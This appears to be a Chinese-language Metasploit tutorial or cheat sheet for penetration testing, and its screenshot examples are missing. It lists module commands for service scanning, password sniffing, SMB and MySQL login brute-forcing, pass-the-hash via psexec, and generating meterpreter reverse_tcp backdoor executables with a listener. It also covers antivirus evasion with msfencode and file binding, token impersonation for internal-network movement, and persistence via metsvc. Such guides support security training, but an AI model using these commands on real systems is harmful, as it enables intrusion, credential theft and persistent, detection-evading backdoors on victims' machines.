简介
Metasploit不仅仅是一个工具软件,它是为自动化地实施经典的、常规的、复杂新颖的攻击,提供基础设施支持的一个完整框架平台。它可以使使用人员将精力集中在渗透测试过程中那些独特的方面上,以及如何识别信息安全计划的弱点上。Metasploit能够让用户通过选择它的渗透攻击模块、攻击载荷和编码器来轻易实施一次渗透攻击,也可以更进一步编写并执行更为复杂的攻击技术。
使用
smb模块
调用use auxiliary/scanner/smb/smb_version

显示设置show options
指定端口set RHOSTS ip段范围
服务识别
调用ssh部分use auxiliary/scanner/ssh/ssh_version

调用ftp部分use auxiliary/scanner/ftp/ftp_version

…(其他操作与上面类似)
密码嗅探
调用use auxiliary/sniffer/psnuffle

snmp扫描
调用use auxiliary/scanner/snmp/snmp_login

调用枚举use auxiliary/scanner/snmp/snmp_enum

SMB登录验证
调用use auxiliary/scanner/smb/smb_login

扫描时,绿色[+]表示成功 ,红色[-]表示失败

VNC身份识别
调用use auxiliary/scanner/vnc/vnc_none_auth

WMAP web扫描
调用load wmap
不同部分的帮助信息
wmap_sites -hwmap_targets -hwmap_run -hwmap_vulns -h
远程代码执行
search 漏洞名, 然后use 相应模块show payload, 然后set payload xxxx,set LHOST(设置本地IP) ,set target xxxxxxexploit有响应后 , 输入shellget shell
示例



口令安全
(以mysql为例)
调用use auxiliary/scanner/scanner/mysql/mysql_login

- 设置target
set RHOSTS xxxx - 设置用户名
set USERNAME xxxxxorset USER-FILE xxxxxx - 设置密码
set PASSWORD xxxxxxorPASS-FILE xxxx exploit
HASH值传递渗透
调用use exploit/windows/smb/psexec

set RHOST xxxxxx, 然后set SMBUSER xxxxxexploithashdumpset smbpass xxxxxx
示例

多种后门生成
目前metasploit可以生成的后门有:
- windows后门
- linux后门
- java后门
- php后门
- jsp后门
- asp后门
- aspx后门
- android后门
- ……
生成后门 msfpayload windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=你想使用的端口 X >路径/名字.exe

监听
user exploit/multi/handlerset payload xxxxxx,set LHOST xxxxx,set LPORT xxxx- 如果你想加密,还可以用
msfencode -e xxxxxxor-tor-o exploit
示例


内网渗透
首先获取到目标ip的c段
知道具体某个域后,可以用如下指令进一步了解
use incognitolist_tokens -uimpersonate_token xxxxxxx- …..

根据不同需要进行不同的深入操作
病毒免杀
免杀的操作有很多种,可以加壳、改壳、改特殊码等等
这里大概展示一下msfencode的部分操作,建议可以多种+多次的组合来操作
示例



……
如果想要绑定正常文件,还可以加入参数-x
XSS+键盘记录
类似的配合还有很多,提供一个大概思路(如图)

维持访问
前提是当前有个session存活
通过服务启动run metsvc -A
回连时使用windows/metsvc_bind_tcp的payload就可以
示例


metasploit的功能十分强大,每个模块的具体功能还有很多,具体还是要靠自己去摸索,去尝试,这样在实际操作中才会面对不同的情况都能灵活应对